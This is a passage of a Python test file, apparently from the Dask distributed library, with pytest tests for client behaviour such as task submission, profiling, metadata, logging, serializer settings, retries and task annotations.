@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
uni_type = str
key = "inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = await future2
assert result2 == 3
future3 = await c.scatter({"data-123": 123})
result3 = await future3["data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
async def f():
x = await c.scatter(123)
y = c.submit(inc, x)
z = await c.gather(y)
return z
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(loop=loop, dashboard_address=":0", silence_logs=False) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
await asyncio.sleep(0.1)
results = await asyncio.gather(
c.call_stack(future), c.call_stack(keys=[future.key])
)
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
ts = a.tasks.get(future.key)
if ts is not None and ts.state == "executing":
w = a
else:
w = b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.01)
result = await c.call_stack()
w = a if a.executing_count else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack()
assert result
@pytest.mark.flaky(condition=WINDOWS, reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await wait(futures)
x = await c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = await c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = await c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = await c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
await wait(x + y)
xp = await c.profile("slowinc")
yp = await c.profile("slowdec")
p = await c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = await c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = await Client(s.address, asynchronous=True, name="foo")
assert "foo" in client.id
await client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
client = await Client(s.address, asynchronous=True)
future = Future(x.key, client)
while future.status != "finished":
await asyncio.sleep(0.01)
await client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = await future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
await c.set_metadata("x", 1)
result = await c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
await wait(future)
await c.set_metadata(key, 123)
result = await c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
await asyncio.sleep(0.01)
with pytest.raises(KeyError):
await c.get_metadata(key)
result = await c.get_metadata(key, None)
assert result is None
await c.set_metadata(["x", "a"], 1)
result = await c.get_metadata("x")
assert result == {"a": 1}
await c.set_metadata(["x", "b"], 2)
result = await c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = await c.get_metadata(["x", "a"])
assert result == 1
await c.set_metadata(["x", "a", "c", "d"], 1)
result = await c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
await wait(c.map(inc, range(5)))
logs = await c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = await c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = await c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = await future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = await Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text or "1.91 MiB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
func = _UnhashableCallable()
result = await c.submit(func, 1)
assert result == 2
@gen_cluster()
async def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = await Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
await c.close()
def test_client_doesnt_close_given_loop(loop_in_thread, s, a, b):
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
await c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
monkeypatch.setenv("USER", "myusername")
with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
link = "http://foo-myusername:12355/status"
assert link == c.dashboard_link
text = c._repr_html_()
assert link in text
@gen_test()
async def test_dashboard_link_inproc():
async with Client(processes=False, asynchronous=True, dashboard_address=":0") as c:
with dask.config.set({"distributed.dashboard.link": "{host}"}):
assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
stop = time()
assert c.status == "closed"
await c.close()
assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
import tornado.httpserver
import tornado.web
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
await c._close(fast=True)
http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
@gen_cluster()
async def test(s, a, b):
np = pytest.importorskip("numpy")
async with Client(
s.address, asynchronous=True, serializers=["dask", "msgpack"]
) as c:
assert (await c.submit(inc, 1)) == 2
await c.submit(np.ones, 5)
await c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
future = await c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
await wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
await c.gather(future, direct=direct)
# Run works
result = await c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = await c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
await c.run(lambda: inc)
with pytest.raises(TypeError):
await c.run_on_scheduler(lambda: inc)
test()
@gen_cluster()
async def test_de_serialization(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=":0") as c:
pass
c._repr_html_()
@pytest.mark.xfail(reason="https://github.com/dask/dask/pull/6807")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
await wait([fx, fy])
assert (o[x.key] < o[y.key]) == (
s.tasks[stringify(fx.key)].priority < s.tasks[stringify(fy.key)].priority
)
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = await c.scatter(1)
y = c.submit(bad_fn, x)
del x
await wait(y)
assert y.status == "error"
await asyncio.sleep(0.1)
assert y.status == "error" # not cancelled
@pytest.mark.xfail(reason="GH#5409 Dask-Default-Threads are frequently detected")
def test_no_threads_lingering():
if threading.active_count() < 40:
return
active = dict(threading._active)
print(f"==== Found {len(active)} active threads: ====")
for t in active.values():
print(t)
assert False
@gen_cluster()
async def test_direct_async(s, a, b):
c = await Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
await c.close()
c = await Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
await c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
assert not c2.futures # Don't create Futures on second Client
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
futures = await asyncio.gather(*(c.scatter(1, direct=True) for _ in range(5)))
x = await futures[0]
x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
await asyncio.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
await future
with dask.config.set(foo=True):
await future.retry()
await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
await y.retry()
await x.retry()
result = await y
assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
await c.gather(c.map(slowinc, range(10), delay=0.2))
state, figure = await c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
await c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
await asyncio.sleep(0.22) # 2 chances
assert not future.done()
w = await Worker(s.address)
start = time()
await future
assert time() < start + 1
await w.close()
with pytest.raises(TimeoutError) as info:
await c.wait_for_workers(n_workers=10, timeout="1 ms")
assert "2/10" in str(info.value).replace(" ", "")
assert "1 ms" in str(info.value)
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
before = proc.num_fds()
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address), Worker(s.address), Client(
s.address, asynchronous=True
):
assert proc.num_fds() > before
await df.sum().persist()
start = time()
while proc.num_fds() > before:
await asyncio.sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_test()
async def test_dashboard_link_cluster():
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(
processes=False, asynchronous=True, dashboard_address=":0"
) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@gen_test()
async def test_shutdown():
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address) as w:
async with Client(s.address, asynchronous=True) as c:
await c.shutdown()
assert s.status == Status.closed
assert w.status == Status.closed
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(
n_workers=1, asynchronous=True, processes=False, dashboard_address=":0"
) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == Status.closed
@gen_test()
async def test_config_inherited_by_subprocess():
with dask.config.set(foo=100):
async with LocalCluster(
n_workers=1,
asynchronous=True,
processes=True,
dashboard_address=":0",
) as lc:
async with Client(lc, asynchronous=True) as c:
assert await c.submit(dask.config.get, "foo") == 100
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
future = c.submit(inc, 1)
async def f(): # flake8: noqa
result = await future
assert result == 2
await f()
future = c.submit(div, 1, 0)
async def f():
with pytest.raises(ZeroDivisionError):
await future
await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
@gen_test()
async def test_async_with():
async with Client(processes=False, dashboard_address=":0", asynchronous=True) as c:
assert await c.submit(lambda x: x + 1, 10) == 11
assert c.status == "closed"
assert c.cluster.status == Status.closed
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@pytest.mark.skipif(WINDOWS, reason="frequently kills off the whole test suite")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
pytest.importorskip("bokeh")
da = pytest.importorskip("dask.array")
async def f(stacklevel, mode=None):
"""
We wrap this in a function so that the assertions aren't in the
performanace report itself
Also, we want this comment to appear
"""
x = da.random.random((1000, 1000), chunks=(100, 100))
with tmpfile(extension="html") as fn:
async with performance_report(
filename=fn, stacklevel=stacklevel, mode=mode
):
await c.compute((x + x.T).sum())
with open(fn) as f:
data = f.read()
return data
# Ensure default kwarg maintains backward compatability
data = await f(stacklevel=1)
assert "Also, we want this comment to appear" in data
assert "bokeh" in data
assert "random" in data
assert "Dask Performance Report" in data
assert "x = da.random" in data
assert "Threads: 4" in data
assert "distributed.scheduler - INFO - Clear task state" in data
assert dask.__version__ in data
# stacklevel=2 captures code two frames back -- which in this case
# is the testing function
data = await f(stacklevel=2)
assert "async def test_performance_report(c, s, a, b):" in data
assert "Dask Performance Report" in data
# stacklevel=0 or lower is overridden to stacklevel=1 so we don't see
# distributed internals
data = await f(stacklevel=0)
assert "Also, we want this comment to appear" in data
assert "Dask Performance Report" in data
data = await f(stacklevel=1, mode="inline")
assert "cdn.bokeh.org" not in data
data = await f(stacklevel=1, mode="cdn")
assert "cdn.bokeh.org" in data
@gen_cluster(nthreads=[])
async def test_client_gather_semaphore_loop(s):
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=60)
async def test_mixed_compression(s):
pytest.importorskip("lz4")
da = pytest.importorskip("dask.array")
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": None}
):
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": "lz4"}
):
async with Client(s.address, asynchronous=True) as c:
await c.get_versions()
x = da.ones((10000, 10000))
y = x + x.T
await c.compute(y.sum())
@gen_cluster(client=True)
async def test_futures_in_subgraphs(c, s, a, b):
"""Regression test of <https://github.com/dask/distributed/issues/4145>"""
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
ddf = dd.from_pandas(
pd.DataFrame(
dict(
uid=range(50),
enter_time=pd.date_range(
start="2020-01-01", end="2020-09-01", periods=50, tz="UTC"
),
)
),
npartitions=5,
)
ddf = ddf[ddf.uid.isin(range(29))].persist()
ddf["local_time"] = ddf.enter_time.dt.tz_convert("US/Central")
ddf["day"] = ddf.enter_time.dt.day_name()
ddf = await c.submit(dd.categorical.categorize, ddf, columns=["day"], index=False)
@gen_cluster(client=True)
async def test_get_task_metadata(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
async with get_task_metadata() as tasks:
f = c.submit(slowinc, 1)
await f
metadata = tasks.metadata
assert f.key in metadata
assert metadata[f.key] == s.tasks.get(f.key).metadata
state = tasks.state
assert f.key in state
assert state[f.key] == "memory"
assert not any(isinstance(p, CollectTaskMetaDataPlugin) for p in s.plugins)
@gen_cluster(client=True)
async def test_get_task_metadata_multiple(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
# Ensure that get_task_metadata only collects metadata for
# tasks which are submitted and completed within its context
async with get_task_metadata() as tasks1:
f1 = c.submit(slowinc, 1)
await f1
async with get_task_metadata() as tasks2:
f2 = c.submit(slowinc, 2)
await f2
metadata1 = tasks1.metadata
metadata2 = tasks2.metadata
assert len(metadata1) == 2
assert sorted(metadata1.keys()) == sorted([f1.key, f2.key])
assert metadata1[f1.key] == s.tasks.get(f1.key).metadata
assert metadata1[f2.key] == s.tasks.get(f2.key).metadata
assert len(metadata2) == 1
assert list(metadata2.keys()) == [f2.key]
assert metadata2[f2.key] == s.tasks.get(f2.key).metadata
@gen_cluster(client=True)
async def test_log_event(c, s, a, b):
# Log an event from inside a task
def foo():
get_worker().log_event("topic1", {"foo": "bar"})
assert not await c.get_events("topic1")
await c.submit(foo)
events = await c.get_events("topic1")
assert len(events) == 1
assert events[0][1] == {"foo": "bar"}
# Log an event while on the scheduler
def log_scheduler(dask_scheduler):
dask_scheduler.log_event("topic2", {"woo": "hoo"})
await c.run_on_scheduler(log_scheduler)
events = await c.get_events("topic2")
assert len(events) == 1
assert events[0][1] == {"woo": "hoo"}
# Log an event from the client process
await c.log_event("topic2", ("alice", "bob"))
events = await c.get_events("topic2")
assert len(events) == 2
assert events[1][1] == ("alice", "bob")
@gen_cluster(client=True)
async def test_annotations_task_state(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(qux="bar", priority=100):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(
{"qux": "bar", "priority": 100} == ts.annotations for ts in s.tasks.values()
)
@pytest.mark.parametrize("fn", ["compute", "persist"])
def test_annotations_compute_time(fn):
da = pytest.importorskip("dask.array")
@gen_cluster(client=True)
async def test(c, s, a, b):
x = da.ones(10, chunks=(5,))
with dask.annotate(foo="bar"):
# Turn off optimization to avoid rewriting layers and picking up annotations
# that way. Instead, we want `compute`/`persist` to be able to pick them up.
x = await getattr(c, fn)(x, optimize_graph=False)
assert all({"foo": "bar"} == ts.annotations for ts in s.tasks.values())
test()
@pytest.mark.xfail(reason="https://github.com/dask/dask/issues/7036")
@gen_cluster(client=True)
async def test_annotations_survive_optimization(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(foo="bar"):
x = da.ones(10, chunks=(5,))
ann = x.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
(xx,) = dask.optimize(x)
ann = xx.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
@gen_cluster(client=True)
async def test_annotations_priorities(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(priority=15):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all("15" in str(ts.priority) for ts in s.tasks.values())
assert all(ts.priority[0] == -15 for ts in s.tasks.values())
assert all({"priority": 15} == ts.annotations for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_workers(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(workers=[a.address]):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all({"workers": (a.address,)} == ts.annotations for ts in s.tasks.values())
assert all({a.address} == ts.worker_restrictions for ts in s.tasks.values())
assert a.data
assert not b.data
@gen_cluster(client=True)
async def test_annotations_retries(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(retries=2):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(ts.retries == 2 for ts in s.tasks.values())
assert all(ts.annotations == {"retries": 2} for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_blockwise_unpack(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
from dask.array.utils import assert_eq
# A flaky doubling function -- need extra args because it is called before
# application to establish dtype/meta.
